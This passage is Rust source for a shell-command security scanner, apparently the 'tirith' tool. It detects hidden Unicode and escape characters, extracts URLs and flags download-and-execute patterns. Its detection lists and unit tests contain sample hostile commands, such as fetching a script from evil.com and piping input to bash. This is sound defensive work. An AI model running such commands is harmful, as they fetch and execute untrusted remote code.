use once_cell::sync::Lazy;
use regex::Regex;
use crate::parse::{self, UrlLike};
use crate::tokenize::{self, Segment, ShellType};
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum ScanContext {
Exec,
Paste,
FileScan,
}
#[allow(dead_code)]
mod tier1_generated {
include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
}
pub fn extractor_ids() -> &'static [&'static str] {
tier1_generated::EXTRACTOR_IDS
}
static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
});
static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
});
static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
Regex::new(
r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
)
.expect("url regex must compile")
});
pub struct ByteScanResult {
pub has_ansi_escapes: bool,
pub has_control_chars: bool,
pub has_bidi_controls: bool,
pub has_zero_width: bool,
pub has_invalid_utf8: bool,
pub has_unicode_tags: bool,
pub has_variation_selectors: bool,
pub has_invisible_math_operators: bool,
pub has_invisible_whitespace: bool,
pub has_hangul_fillers: bool,
pub has_confusable_text: bool,
pub details: Vec<ByteFinding>,
}
pub struct ByteFinding {
pub offset: usize,
pub byte: u8,
pub codepoint: Option<u32>,
pub description: String,
}
impl ByteScanResult {
pub fn with_ignored_range(mut self, ignore: &std::ops::Range<usize>) -> Self {
self.details.retain(|d| !ignore.contains(&d.offset));
self.has_ansi_escapes = false;
self.has_control_chars = false;
self.has_bidi_controls = false;
self.has_zero_width = false;
self.has_unicode_tags = false;
self.has_variation_selectors = false;
self.has_invisible_math_operators = false;
self.has_invisible_whitespace = false;
self.has_hangul_fillers = false;
self.has_confusable_text = false;
for d in &self.details {
let desc = d.description.as_str();
if desc.ends_with("escape sequence") || desc == "trailing escape byte" {
self.has_ansi_escapes = true;
} else if desc.starts_with("control character") {
self.has_control_chars = true;
} else if desc.starts_with("bidi control") {
self.has_bidi_controls = true;
} else if desc.starts_with("zero-width character") {
self.has_zero_width = true;
} else if desc.starts_with("unicode tag") {
self.has_unicode_tags = true;
} else if desc.starts_with("variation selector") {
self.has_variation_selectors = true;
} else if desc.starts_with("invisible math operator") {
self.has_invisible_math_operators = true;
} else if desc.starts_with("invisible whitespace") {
self.has_invisible_whitespace = true;
} else if desc.starts_with("hangul filler") {
self.has_hangul_fillers = true;
} else if desc.starts_with("confusable") || desc.starts_with("text confusable") {
self.has_confusable_text = true;
}
}
self
}
}
pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
match context {
ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
ScanContext::FileScan => true,
}
}
pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
let mut result = ByteScanResult {
has_ansi_escapes: false,
has_control_chars: false,
has_bidi_controls: false,
has_zero_width: false,
has_invalid_utf8: false,
has_unicode_tags: false,
has_variation_selectors: false,
has_invisible_math_operators: false,
has_invisible_whitespace: false,
has_hangul_fillers: false,
has_confusable_text: false,
details: Vec::new(),
};
if std::str::from_utf8(input).is_err() {
result.has_invalid_utf8 = true;
}
let len = input.len();
let mut i = 0;
while i < len {
let b = input[i];
if b == 0x1b {
if i + 1 < len {
let next = input[i + 1];
if next == b'[' || next == b']' || next == b'_' || next == b'P' {
result.has_ansi_escapes = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: match next {
b'[' => "CSI escape sequence",
b']' => "OSC escape sequence",
b'_' => "APC escape sequence",
b'P' => "DCS escape sequence",
_ => "escape sequence",
}
.to_string(),
});
i += 2;
continue;
}
} else {
result.has_ansi_escapes = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: "trailing escape byte".to_string(),
});
}
}
if b == b'\r' {
let is_attack_cr = i + 1 < len && input[i + 1] != b'\n';
if is_attack_cr {
result.has_control_chars = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: format!("control character 0x{b:02x}"),
});
}
} else if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
result.has_control_chars = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: format!("control character 0x{b:02x}"),
});
}
if b == 0x7F {
result.has_control_chars = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: None,
description: "control character 0x7f (DEL)".to_string(),
});
}
if b >= 0xc0 {
let remaining = &input[i..];
if let Some(ch) = std::str::from_utf8(remaining)
.ok()
.or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
.and_then(|s| s.chars().next())
{
if is_bidi_control(ch) {
result.has_bidi_controls = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("bidi control U+{:04X}", ch as u32),
});
}
if is_zero_width(ch) && !(ch == '\u{FEFF}' && i == 0) {
result.has_zero_width = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("zero-width character U+{:04X}", ch as u32),
});
}
if is_unicode_tag(ch) {
result.has_unicode_tags = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("unicode tag U+{:04X}", ch as u32),
});
}
if is_variation_selector(ch) {
result.has_variation_selectors = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("variation selector U+{:04X}", ch as u32),
});
}
if is_invisible_math_operator(ch) {
result.has_invisible_math_operators = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("invisible math operator U+{:04X}", ch as u32),
});
}
if is_invisible_whitespace(ch) {
result.has_invisible_whitespace = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("invisible whitespace U+{:04X}", ch as u32),
});
}
if is_hangul_filler(ch) {
result.has_hangul_fillers = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!("hangul filler U+{:04X}", ch as u32),
});
}
if let Some(target) = crate::text_confusables::is_text_confusable(ch) {
result.has_confusable_text = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!(
"text confusable U+{:04X} (looks like '{target}')",
ch as u32
),
});
} else if let Some(target) = crate::confusables::is_confusable(ch) {
result.has_confusable_text = true;
result.details.push(ByteFinding {
offset: i,
byte: b,
codepoint: Some(ch as u32),
description: format!(
"confusable U+{:04X} (looks like '{target}')",
ch as u32
),
});
}
i += ch.len_utf8();
continue;
}
}
i += 1;
}
result
}
fn is_bidi_control(ch: char) -> bool {
matches!(
ch,
'\u{200E}' | '\u{200F}' | '\u{202A}' | '\u{202B}' | '\u{202C}' | '\u{202D}' | '\u{202E}' | '\u{2066}' | '\u{2067}' | '\u{2068}' | '\u{2069}' )
}
fn is_zero_width(ch: char) -> bool {
matches!(
ch,
'\u{180E}' | '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{FEFF}' | '\u{034F}' | '\u{00AD}' | '\u{2060}' )
}
fn is_unicode_tag(ch: char) -> bool {
('\u{E0000}'..='\u{E007F}').contains(&ch)
}
fn is_variation_selector(ch: char) -> bool {
('\u{FE00}'..='\u{FE0F}').contains(&ch) || ('\u{E0100}'..='\u{E01EF}').contains(&ch)
}
fn is_hangul_filler(ch: char) -> bool {
matches!(
ch,
'\u{3164}' | '\u{115F}' | '\u{1160}' )
}
fn is_invisible_math_operator(ch: char) -> bool {
('\u{2061}'..='\u{2064}').contains(&ch)
}
fn is_invisible_whitespace(ch: char) -> bool {
matches!(
ch,
'\u{2000}' | '\u{2001}' | '\u{2002}' | '\u{2003}' | '\u{2004}' | '\u{2005}' | '\u{2006}' | '\u{2007}' | '\u{2008}' | '\u{2009}' | '\u{200A}' | '\u{205F}' )
}
pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
let segments = tokenize::tokenize(input, shell);
let mut results = Vec::new();
for (seg_idx, segment) in segments.iter().enumerate() {
let sink_context = is_sink_context(segment, &segments);
let resolved = resolve_segment_command(segment);
let inspection_skip_args_from: Option<usize> = if seg_idx == 0 {
resolved.as_ref().and_then(|cmd| {
if cmd.name != "tirith" {
return None;
}
let start_from: usize =
if segment.command.as_deref().map(command_base_name).as_deref()
== Some("tirith")
{
0
} else if let Some(at) = segment
.args
.iter()
.position(|a| command_base_name(a) == "tirith")
{
at + 1
} else {
return None;
};
let mut i = start_from;
while i < segment.args.len() {
let clean = strip_quotes(&segment.args[i]);
if clean.starts_with('-') {
i += 1;
continue;
}
break;
}
let sub_arg = segment.args.get(i)?;
if is_tirith_inspection_subcommand(&command_base_name(sub_arg)) {
Some(i)
} else {
None
}
})
} else {
None
};
let mut url_sources: Vec<&str> = Vec::new();
if let Some(ref cmd) = segment.command {
url_sources.push(cmd.as_str());
}
for (arg_idx, arg) in segment.args.iter().enumerate() {
if let Some(skip_from) = inspection_skip_args_from {
if arg_idx >= skip_from {
break;
}
}
url_sources.push(arg.as_str());
}
for (name, value) in tokenize::leading_env_assignments(&segment.raw) {
if ignores_env_assignment_url(&name) {
continue;
}
let clean = strip_quotes(&value);
if !clean.is_empty() {
push_urls_from_source(&clean, seg_idx, sink_context, &mut results);
}
}
for source in &url_sources {
push_urls_from_source(source, seg_idx, sink_context, &mut results);
}
let is_docker_cmd = resolved
.as_ref()
.is_some_and(|cmd| matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl"));
if sink_context && !is_docker_cmd {
if let Some(cmd) = resolved.as_ref() {
let is_remote_copy = matches!(cmd.name.as_str(), "scp" | "rsync");
for (arg_idx, arg) in cmd.args.iter().enumerate() {
if is_output_flag_value(&cmd.name, cmd.args, arg_idx) {
continue;
}
let clean = strip_quotes(arg);
if is_remote_copy {
let _ = parse_scp_remote_spec(&clean, shell);
continue;
}
if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
results.push(ExtractedUrl {
raw: clean.clone(),
parsed: UrlLike::SchemelessHostPath {
host: extract_host_from_schemeless(&clean),
path: extract_path_from_schemeless(&clean),
},
segment_index: seg_idx,
in_sink_context: true,
});
}
}
}
}
if let Some(cmd) = resolved.as_ref() {
if matches!(cmd.name.as_str(), "docker" | "podman" | "nerdctl") {
if let Some(docker_subcmd) = cmd.args.first() {
let subcmd_lower = docker_subcmd.to_lowercase();
if subcmd_lower == "build" {
let mut i = 1;
while i < cmd.args.len() {
let arg = strip_quotes(&cmd.args[i]);
if (arg == "-t" || arg == "--tag") && i + 1 < cmd.args.len() {
let tag_val = strip_quotes(&cmd.args[i + 1]);
if !tag_val.is_empty() {
let docker_url = parse::parse_docker_ref(&tag_val);
results.push(ExtractedUrl {
raw: tag_val,
parsed: docker_url,
segment_index: seg_idx,
in_sink_context: true,
});
}
i += 2;
} else if arg.starts_with("-t") && arg.len() > 2 {
let tag_val = strip_quotes(&arg[2..]);
let docker_url = parse::parse_docker_ref(&tag_val);
results.push(ExtractedUrl {
raw: tag_val,
parsed: docker_url,
segment_index: seg_idx,
in_sink_context: true,
});
i += 1;
} else if let Some(val) = arg.strip_prefix("--tag=") {
let tag_val = strip_quotes(val);
let docker_url = parse::parse_docker_ref(&tag_val);
results.push(ExtractedUrl {
raw: tag_val,
parsed: docker_url,
segment_index: seg_idx,
in_sink_context: true,
});
i += 1;
} else {
i += 1;
}
}
} else if subcmd_lower == "image" {
if let Some(image_subcmd) = cmd.args.get(1) {
let image_subcmd_lower = image_subcmd.to_lowercase();
if matches!(
image_subcmd_lower.as_str(),
"pull" | "push" | "inspect" | "rm" | "tag"
) {
extract_first_docker_image(&cmd.args[2..], seg_idx, &mut results);
}
}
} else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
extract_first_docker_image(&cmd.args[1..], seg_idx, &mut results);
}
}
}
}
}
results
}
#[derive(Debug, Clone)]
pub struct ExtractedUrl {
pub raw: String,
pub parsed: UrlLike,
pub segment_index: usize,
pub in_sink_context: bool,
}
const DOCKER_VALUE_FLAGS: &[&str] = &[
"--platform",
"--format",
"--filter",
"-f",
"--label",
"-l",
"--name",
"--hostname",
"--user",
"-u",
"--workdir",
"-w",
"--network",
"--net",
"--env",
"-e",
"--env-file",
"--publish",
"-p",
"--expose",
"--volume",
"-v",
"--mount",
"--add-host",
"--device",
"--entrypoint",
"--log-driver",
"--log-opt",
"--restart",
"--runtime",
"--cpus",
"--cpu-shares",
"--cpu-quota",
"--memory",
"--memory-reservation",
"--memory-swap",
"--shm-size",
"--ulimit",
"--security-opt",
"--sysctl",
"--tmpfs",
"--gpus",
"--ipc",
"--pid",
"--userns",
"--cgroupns",
];
const DOCKER_VALUE_PREFIXES: &[&str] = &["-p", "-e", "-v", "-l", "-u", "-w"];
fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
let mut skip_next = false;
let mut end_of_options = false;
for arg in args {
if skip_next {
skip_next = false;
continue;
}
let clean = strip_quotes(arg);
if clean == "--" {
end_of_options = true;
continue;
}
if !end_of_options && clean.starts_with("--") && clean.contains('=') {
continue;
}
if !end_of_options && clean.starts_with('-') {
if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
skip_next = true;
}
if DOCKER_VALUE_PREFIXES
.iter()
.any(|p| clean.starts_with(p) && clean.len() > p.len())
{
continue;
}
continue;
}
if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
let docker_url = parse::parse_docker_ref(&clean);
results.push(ExtractedUrl {
raw: clean,
parsed: docker_url,
segment_index: seg_idx,
in_sink_context: true,
});
}
break;
}
}
#[derive(Debug, Clone)]
struct ResolvedCommand<'a> {
name: String,
args: &'a [String],
}
fn push_urls_from_source(
source: &str,
segment_index: usize,
in_sink_context: bool,
results: &mut Vec<ExtractedUrl>,
) {
for mat in URL_REGEX.find_iter(source) {
let raw = mat.as_str().to_string();
let url = parse::parse_url(&raw);
results.push(ExtractedUrl {
raw,
parsed: url,
segment_index,
in_sink_context,
});
}
}
fn ignores_env_assignment_url(name: &str) -> bool {
let upper = name.to_ascii_uppercase();
upper == "NO_PROXY" || upper.ends_with("_PROXY")
}
fn env_long_flag_takes_value(flag: &str) -> bool {
let name = flag.split_once('=').map(|(name, _)| name).unwrap_or(flag);
matches!(name, "--unset" | "--chdir" | "--split-string")
}
fn command_base_name(raw: &str) -> String {
let clean = strip_quotes(raw);
clean
.rsplit(['/', '\\'])
.next()
.unwrap_or(clean.as_str())
.to_lowercase()
}
fn resolve_segment_command(segment: &Segment) -> Option<ResolvedCommand<'_>> {
let command = segment.command.as_ref()?;
resolve_named_command(command, &segment.args)
}
pub fn resolve_wrapped_command(segment: &Segment) -> Option<(String, Vec<String>)> {
let resolved = resolve_segment_command(segment)?;
Some((resolved.name, resolved.args.to_vec()))
}
fn resolve_named_command<'a>(command: &str, args: &'a [String]) -> Option<ResolvedCommand<'a>> {
let name = command_base_name(command);
match name.as_str() {
"env" => resolve_env_command(args),
"command" => resolve_command_wrapper(args),
"time" => resolve_time_wrapper(args),
"sudo" | "doas" => resolve_sudo_wrapper(args),
"tirith" => resolve_tirith_command(args),
_ => Some(ResolvedCommand { name, args }),
}
}
fn resolve_sudo_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
const SUDO_VALUE_FLAGS: &[&str] = &["-u", "-g", "-p", "-C", "-D", "-U", "-r", "-t"];
const SUDO_LONG_VALUE_FLAGS: &[&str] = &[
"--user",
"--group",
"--prompt",
"--close-from",
"--chdir",
"--other-user",
"--role",
"--type",
"--host",
];
let mut i = 0;
let mut after_dashdash = false;
while i < args.len() {
let clean = strip_quotes(&args[i]);
if !after_dashdash && clean == "--" {
after_dashdash = true;
i += 1;
continue;
}
if !after_dashdash && tokenize::is_env_assignment(&clean) {
i += 1;
continue;
}
if !after_dashdash && clean.starts_with("--") {
let name_part = clean.split_once('=').map(|(n, _)| n).unwrap_or(&clean);
if !clean.contains('=') && SUDO_LONG_VALUE_FLAGS.contains(&name_part) {
i += 2;
} else {
i += 1;
}
continue;
}
if !after_dashdash && clean.starts_with('-') {
if SUDO_VALUE_FLAGS.contains(&clean.as_str()) {
i += 2;
continue;
}
i += 1;
continue;
}
return resolve_named_command(&clean, &args[i + 1..]);
}
None
}
fn resolve_env_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
let mut i = 0;
while i < args.len() {
let clean = strip_quotes(&args[i]);
if clean == "--" {
i += 1;
break;
}
if tokenize::is_env_assignment(&clean) {
i += 1;
continue;
}
if clean.starts_with('-') {
if clean.starts_with("--") {
if env_long_flag_takes_value(&clean) && !clean.contains('=') {
i += 2;
} else {
i += 1;
}
continue;
}
if clean == "-u" || clean == "-C" || clean == "-S" {
i += 2;
continue;
}
i += 1;
continue;
}
return resolve_named_command(&clean, &args[i + 1..]);
}
while i < args.len() {
let clean = strip_quotes(&args[i]);
if tokenize::is_env_assignment(&clean) {
i += 1;
continue;
}
return resolve_named_command(&clean, &args[i + 1..]);
}
None
}
fn resolve_command_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
let mut i = 0;
while i < args.len() {
let clean = strip_quotes(&args[i]);
if clean == "--" {
i += 1;
break;
}
if clean.starts_with('-') {
i += 1;
continue;
}
break;
}
args.get(i)
.and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
}
fn resolve_time_wrapper(args: &[String]) -> Option<ResolvedCommand<'_>> {
let mut i = 0;
while i < args.len() {
let clean = strip_quotes(&args[i]);
if clean == "--" {
i += 1;
break;
}
if clean.starts_with('-') {
if clean == "-f" || clean == "--format" || clean == "-o" || clean == "--output" {
i += 2;
} else {
i += 1;
}
continue;
}
break;
}
args.get(i)
.and_then(|arg| resolve_named_command(arg, &args[i + 1..]))
}
fn resolve_tirith_command(args: &[String]) -> Option<ResolvedCommand<'_>> {
let subcommand = args.first().map(|arg| command_base_name(arg))?;
match subcommand.as_str() {
"run" => Some(ResolvedCommand {
name: "tirith-run".to_string(),
args: &args[1..],
}),
_ => Some(ResolvedCommand {
name: "tirith".to_string(),
args,
}),
}
}
fn is_tirith_inspection_subcommand(sub: &str) -> bool {
matches!(sub, "diff" | "score" | "why" | "receipt" | "explain")
}
pub fn tirith_inert_arg_range(input: &str, shell: ShellType) -> Option<std::ops::Range<usize>> {
let segments = tokenize::tokenize(input, shell);
let first = segments.first()?;
let resolved = resolve_segment_command(first)?;
if resolved.name != "tirith" {
return None;
}
let mut sub_idx = 0;
while sub_idx < resolved.args.len() {
let clean = strip_quotes(&resolved.args[sub_idx]);
if clean.starts_with('-') {
sub_idx += 1;
continue;
}
break;
}
let sub_arg = resolved.args.get(sub_idx)?;
let subcommand = command_base_name(sub_arg);
if !is_tirith_inspection_subcommand(&subcommand) {
return None;
}
let seg_slice = input.get(first.byte_range.clone())?;
let sub_rel = find_subcommand_token(seg_slice, sub_arg.as_str())?;
let inert_start = first.byte_range.start + sub_rel + sub_arg.len();
let inert_end = first.byte_range.end;
if inert_start >= inert_end {
return None;
}
Some(inert_start..inert_end)
}
fn find_subcommand_token(haystack: &str, needle: &str) -> Option<usize> {
let bytes = haystack.as_bytes();
let n = needle.len();
let mut search_from = 0;
while let Some(rel) = haystack.get(search_from..)?.find(needle) {
let abs = search_from + rel;
let preceded_by_ws_or_start =
abs == 0 || matches!(bytes.get(abs - 1), Some(b) if b.is_ascii_whitespace());
let followed_by_ws_or_end = abs + n == bytes.len()
|| matches!(bytes.get(abs + n), Some(b) if b.is_ascii_whitespace());
if preceded_by_ws_or_start && followed_by_ws_or_end {
return Some(abs);
}
search_from = abs + 1;
}
None
}
fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
if let Some(cmd) = resolve_segment_command(segment) {
let cmd_lower = cmd.name;
if cmd_lower == "git" {
return is_git_sink(cmd.args);
}
if is_source_command(&cmd_lower) {
return true;
}
}
if let Some(sep) = &segment.preceding_separator {
if sep == "|" || sep == "|&" {
if let Some(cmd) = resolve_segment_command(segment) {
if is_interpreter(&cmd.name) {
return true;
}
}
}
}
false
}
fn is_source_command(cmd: &str) -> bool {
matches!(
cmd,
"curl"
| "wget"
| "http"
| "https"
| "xh"
| "fetch"
| "scp"
| "rsync"
| "docker"
| "podman"
| "nerdctl"
| "pip"
| "pip3"
| "npm"
| "npx"
| "yarn"
| "pnpm"
| "go"
| "cargo"
| "iwr"
| "irm"
| "invoke-webrequest"
| "invoke-restmethod"
| "tirith-run"
)
}
pub struct ScpRemoteSpec {
pub user: Option<String>,
pub host: String,
pub path: String,
}
pub fn parse_scp_remote_spec(arg: &str, shell: ShellType) -> Option<ScpRemoteSpec> {
if arg.is_empty() || arg.starts_with('-') || arg.contains("://") {
return None;
}
if let Some(at_pos) = arg.find('@') {
let before_at = &arg[..at_pos];
let after_at = &arg[at_pos + 1..];
if before_at.is_empty() || after_at.is_empty() || before_at.contains(':') {
return None;
}
let (host, path) = match after_at.find(':') {
Some(colon_pos) => {
if colon_pos > 0 && after_at.as_bytes()[colon_pos - 1] == b'/' {
return None;
}
(
&after_at[..colon_pos],
after_at[colon_pos + 1..].to_string(),
)
}
None => (after_at, String::new()),
};
if !is_valid_scp_host(host) {
return None;
}
return Some(ScpRemoteSpec {
user: Some(before_at.to_string()),
host: host.to_string(),
path,
});
}
let colon_pos = arg.find(':')?;
if colon_pos > 0 && arg.as_bytes()[colon_pos - 1] == b'/' {
return None;
}
let host = &arg[..colon_pos];
let after_colon = &arg[colon_pos + 1..];
if !is_valid_scp_host(host) {
return None;
}
if host.len() == 1 && host.chars().next().unwrap().is_ascii_alphabetic() {
let first_after = after_colon.chars().next();
match first_after {
Some('\\') => return None,
Some('/') if matches!(shell, ShellType::PowerShell | ShellType::Cmd) => {
return None;
}
_ => {}
}
}
Some(ScpRemoteSpec {
user: None,
host: host.to_string(),
path: after_colon.to_string(),
})
}
fn is_valid_scp_host(host: &str) -> bool {
!host.is_empty()
&& !host.contains('/')
&& !host.contains(':')
&& host
.chars()
.all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
}
fn is_git_sink(args: &[String]) -> bool {
if args.is_empty() {
return false;
}
for arg in args {
let clean = strip_quotes(arg);
if clean.starts_with('-') {
continue;
}
return matches!(
clean.as_str(),
"clone" | "fetch" | "pull" | "submodule" | "remote"
);
}
false
}
fn is_interpreter(cmd: &str) -> bool {
matches!(
cmd,
"sh" | "bash"
| "zsh"
| "dash"
| "ksh"
| "python"
| "python3"
| "node"
| "perl"
| "ruby"
| "php"
| "iex"
| "invoke-expression"
)
}
fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
let cmd_lower = cmd.to_lowercase();
let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
match cmd_base {
"curl" => {
if arg_index > 0 {
let prev = strip_quotes(&args[arg_index - 1]);
if prev == "-o"
|| prev == "--output"
|| prev == "-u"
|| prev == "--user"
|| prev == "-U"
|| prev == "--proxy-user"
{
return true;
}
}
let current = strip_quotes(&args[arg_index]);
if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
return true;
}
if current.starts_with("--output=")
|| current.starts_with("--user=")
|| current.starts_with("--proxy-user=")
{
return true;
}
false
}
"wget" => {
if arg_index > 0 {
let prev = strip_quotes(&args[arg_index - 1]);
if prev == "-O"
|| prev == "--output-document"
|| prev == "--user"
|| prev == "--password"
|| prev == "--http-user"
|| prev == "--http-password"
|| prev == "--ftp-user"
|| prev == "--ftp-password"
|| prev == "--proxy-user"
|| prev == "--proxy-password"
{
return true;
}
}
let current = strip_quotes(&args[arg_index]);
if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
return true;
}
if current.starts_with("--output-document=")
|| current.starts_with("--user=")
|| current.starts_with("--password=")
|| current.starts_with("--http-user=")
|| current.starts_with("--http-password=")
|| current.starts_with("--ftp-user=")
|| current.starts_with("--ftp-password=")
|| current.starts_with("--proxy-user=")
|| current.starts_with("--proxy-password=")
{
return true;
}
false
}
"http" | "https" | "xh" => {
if arg_index > 0 {
let prev = strip_quotes(&args[arg_index - 1]);
if prev == "-a" || prev == "--auth" {
return true;
}
}
let current = strip_quotes(&args[arg_index]);
if current.starts_with("--auth=") {
return true;
}
false
}
_ => false,
}
}
fn strip_quotes(s: &str) -> String {
let s = s.trim();
if s.len() >= 2
&& ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
{
s[1..s.len() - 1].to_string()
} else {
s.to_string()
}
}
fn looks_like_schemeless_host(s: &str) -> bool {
if s.starts_with('-') || !s.contains('.') {
return false;
}
if s.starts_with('.') {
return false;
}
let host_part = s.split('/').next().unwrap_or(s);
if !host_part.contains('.') || host_part.contains(' ') {
return false;
}
let host_lower = host_part.to_lowercase();
let has_meaningful_path = s.find('/').is_some_and(|idx| {
let after_slash = &s[idx + 1..];
!after_slash.is_empty() && after_slash != "/"
});
if !has_meaningful_path {
let file_exts = [
".sh",
".py",
".rb",
".js",
".ts",
".go",
".rs",
".c",
".h",
".txt",
".md",
".json",
".yaml",
".yml",
".xml",
".html",
".css",
".tar.gz",
".tar.bz2",
".tar.xz",
".tgz",
".zip",
".gz",
".bz2",
".rpm",
".deb",
".pkg",
".dmg",
".exe",
".msi",
".dll",
".so",
".log",
".conf",
".cfg",
".ini",
".toml",
".png",
".jpg",
".jpeg",
".gif",
".bmp",
".ico",
".tiff",
".tif",
".pdf",
".csv",
".mp3",
".mp4",
".wav",
".avi",
".mkv",
".flac",
".ogg",
".webm",
".ttf",
".otf",
".woff",
".woff2",
".docx",
".xlsx",
".pptx",
".sqlite",
".lock",
".example",
".local",
".bak",
".tmp",
".swp",
".orig",
".patch",
".diff",
".map",
".env",
".sample",
".dist",
".editorconfig",
];
if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
return false;
}
}
let labels: Vec<&str> = host_part.split('.').collect();
if labels.len() < 2 {
return false;
}
let tld = labels.last().unwrap();
tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
}
fn extract_host_from_schemeless(s: &str) -> String {
s.split('/').next().unwrap_or(s).to_string()
}
fn extract_path_from_schemeless(s: &str) -> String {
if let Some(idx) = s.find('/') {
s[idx..].to_string()
} else {
String::new()
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_tier1_exec_matches_url() {
assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_no_match_simple() {
assert!(!tier1_scan("ls -la", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_no_match_echo() {
assert!(!tier1_scan("echo hello world", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_bash() {
assert!(tier1_scan("something | bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_sudo_bash() {
assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_env_bash() {
assert!(tier1_scan("something | env bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_pipe_bin_bash() {
assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_git_scp() {
assert!(tier1_scan(
"git clone git@github.com:user/repo",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_punycode() {
assert!(tier1_scan(
"curl https://xn--example-cua.com",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_docker() {
assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_iwr() {
assert!(tier1_scan(
"iwr https://evil.com/script.ps1",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_curl() {
assert!(tier1_scan(
"curl https://example.com/install.sh",
ScanContext::Exec
));
}
#[test]
fn test_tier1_exec_matches_lookalike_tld() {
assert!(tier1_scan("open file.zip", ScanContext::Exec));
}
#[test]
fn test_tier1_exec_matches_shortener() {
assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
}
#[test]
fn test_tier1_paste_matches_non_ascii() {
assert!(tier1_scan("café", ScanContext::Paste));
}
#[test]
fn test_tier1_paste_exec_patterns_also_match() {
assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
}
#[test]
fn test_tier1_exec_no_non_ascii() {
assert!(!tier1_scan("echo café", ScanContext::Exec));
}
#[test]
fn test_byte_scan_ansi() {
let input = b"hello \x1b[31mred\x1b[0m world";
let result = scan_bytes(input);
assert!(result.has_ansi_escapes);
}
#[test]
fn test_byte_scan_control_chars() {
let input = b"hello\rworld";
let result = scan_bytes(input);
assert!(result.has_control_chars);
}
#[test]
fn test_byte_scan_bidi() {
let input = "hello\u{202E}dlrow".as_bytes();
let result = scan_bytes(input);
assert!(result.has_bidi_controls);
}
#[test]
fn test_byte_scan_zero_width() {
let input = "hel\u{200B}lo".as_bytes();
let result = scan_bytes(input);
assert!(result.has_zero_width);
}
#[test]
fn test_byte_scan_clean() {
let input = b"hello world\n";
let result = scan_bytes(input);
assert!(!result.has_ansi_escapes);
assert!(!result.has_control_chars);
assert!(!result.has_bidi_controls);
assert!(!result.has_zero_width);
}
#[test]
fn test_extract_urls_basic() {
let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
assert_eq!(urls.len(), 1);
assert_eq!(urls[0].raw, "https://example.com/install.sh");
}
#[test]
fn test_extract_urls_from_leading_env_assignment() {
let urls = extract_urls(
"PAYLOAD_URL=https://example.com/install.sh curl ok",
ShellType::Posix,
);
